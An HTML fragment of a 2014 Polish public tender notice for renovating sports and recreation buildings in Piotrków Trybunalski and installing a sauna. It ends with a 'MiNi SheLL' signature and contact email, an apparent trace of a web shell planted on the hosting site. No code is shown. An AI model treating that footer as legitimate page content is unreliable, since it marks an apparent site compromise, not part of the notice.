<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.osirpt.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Sportu i Rekreacji
97 - 300 Piotrków Trybunalski
Al. 3 Maja 6B
pokój 315.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2014 godzina 10:00, miejsce: Ośrodek Sportu i Rekreacji
97 - 300 Piotrków Trybunalski
Al. 3 Maja 6B
pokój 301.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> REMONT  OBIEKTÓW OŚRODKA SPORTU I REKREACJI W PIOTRKOWIE TRYBUNALSKIM:
- BUDYNKU CENTRUM REKREACYJNO - REHABILITACYJNEGO 
  UL.  BELZACKA  108/110  
- OGRODZENIA BOISKA UL. ZAWIŁA 37
- BUDYNKU HALI  RELAX  AL. 3 MAJA 6B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Remont budynku Centrum Rekreacyjno-Rehabilitacyjnego przy ul. Belzackiej 108/110.
2.	Remont ogrodzenia boiska przy ul. Zawiłej 37.
3.	Remont budynku hali  Relax  przy Al. 3 Maja 6B.
4.	Remont pomieszczenia pod archiwum w budynku hali  Relax  przy Al. 3 Maja 6B.
5.	Wykonanie aranżacji recepcji w  budynku hali  Relax  przy Al. 3 Maja 6B.
6.	Remont budynku hali  Relax  przy Al. 3 Maja 6B - naprawa świetlików.
7.	Wykonawca udzieli minimum 12 miesięcy gwarancji jakości na wykonany przedmiot zamówienia.
8.	Zamawiający wymaga należytej staranności przy realizacji niniejszego  zamówienia.
9.	Szczegółowy opis przedmiotu zamówienia  podano w Przedmiarach, Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych i projekcie aranżacji recepcji w Hali Relax, które stanowią załączniki do SIWZ.
10.	Termin wykonania zamówienia 42 dni od dnia podpisania umowy.
11.	 Wykonawca na podstawie Przedmiarów opracuje  sześć Kosztorysów Ofertowych na w/w roboty i dołączy Kosztorysy Ofertowe do Formularza Ofertowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> DOSTAWA I MONTAŻ SAUNY W BUDYNKU HALI RELAX AL. 3 MAJA 6B W  PIOTRKOWIE TRYBUNALSKIM.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Dostawa i montaż sauny
2. Wykonawca udzieli minimum 36 miesięcy gwarancji na wszystkie  wykonane roboty  budowlane, a na dostarczony i zamontowany sprzęt  obowiązywać będzie gwarancja producenta.
3. Zamawiający wymaga należytej staranności przy realizacji niniejszego  zamówienia.
4. Szczegółowy opis przedmiotu zamówienia  podano w Przedmiarze i Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych, które stanowią załączniki do SIWZ.
5. Termin wykonania zamówienia 42 dni od dnia podpisania umowy.
6. Wykonawca na podstawie Przedmiaru opracuje  Kosztorys Ofertowy na w/w robotę i dołączy Kosztorys Ofertowy do Formularza Ofertowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com